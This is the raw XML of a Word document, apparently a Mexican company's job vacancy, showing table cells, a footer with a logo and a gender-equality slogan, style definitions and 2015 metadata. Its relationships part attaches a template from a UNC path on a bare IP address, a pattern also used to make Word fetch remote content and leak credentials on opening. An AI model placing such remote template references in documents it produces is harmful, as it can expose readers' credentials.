                    <w:rPr>
                      <w:b/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="006B028A">
                    <w:rPr>
                      <w:b/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Español</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4537" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="48A7364E" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>-</w:t>
                  </w:r>
                  <w:r w:rsidR="006B028A" w:rsidRPr="006B028A">
                    <w:rPr>
                      <w:b/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>N/A</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="5F3F5C6A" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FCC8595" w14:textId="77777777" w:rsidR="00DD56B1" w:rsidRDefault="00DD56B1"/>
    <w:sectPr w:rsidR="00DD56B1" w:rsidSect="006B028A">
      <w:footerReference w:type="default" r:id="rId8"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="36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BACBC" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3BBBA9AF" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F3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64D37" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="837A75"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        <w:noProof/>
        <w:color w:val="837A75"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1761E95D" wp14:editId="22425CB8">
          <wp:extent cx="1993900" cy="419100"/>
          <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
          <wp:docPr id="6" name="Picture 6" descr="http://www.keyworks.com.mx/IMG/DetalleVacantes/rse%20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yworks.com.mx/IMG/DetalleVacantes/rse%20lo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900" cy="419100"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:inline>
      </w:drawing>
    </w:r>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="837A75"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t> </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="2E6D0AFA" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>“</w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Somos</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>una</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>empresa</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>comprometida</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> con la </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>equidad</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> de </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>género</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> e </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>igualdad</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> de </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>oportunidades</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r w:rsidRPr="00F306E4">
      <w:rPr>
        <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>”</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="284AE40D" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRDefault="00F306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0DF43" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="045FCBCE" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F30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6E4"/>
    <w:rsid w:val="000A7154"/>
    <w:rsid w:val="006B028A"/>
    <w:rsid w:val="00DD56B1"/>
    <w:rsid w:val="00F30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CAC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E4"/>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Grande" w:hAnsi="Lucida Grande" w:cs="Lucida Grande"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:val="es-ES_tradnl"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F306E4"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F306E4"/>
    <w:rPr>
      <w:lang w:val="es-ES_tradnl"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F306E4"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F306E4"/>
    <w:rPr>
      <w:lang w:val="es-ES_tradnl"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F306E4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F306E4"/>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E4"/>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Grande" w:hAnsi="Lucida Grande" w:cs="Lucida Grande"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:val="es-ES_tradnl"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F306E4"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F306E4"/>
    <w:rPr>
      <w:lang w:val="es-ES_tradnl"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F306E4"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F306E4"/>
    <w:rPr>
      <w:lang w:val="es-ES_tradnl"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F306E4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F306E4"/>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936633">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="413747927">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1671637589">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1188448154">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2053573526">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="809136199">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="300"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="5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Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="file://\\54.80.182.85\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Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>9</Lines>
  <Paragraphs>2</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Personal</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howard</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Enrique howard</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-09-30T23:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-09-30T23:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>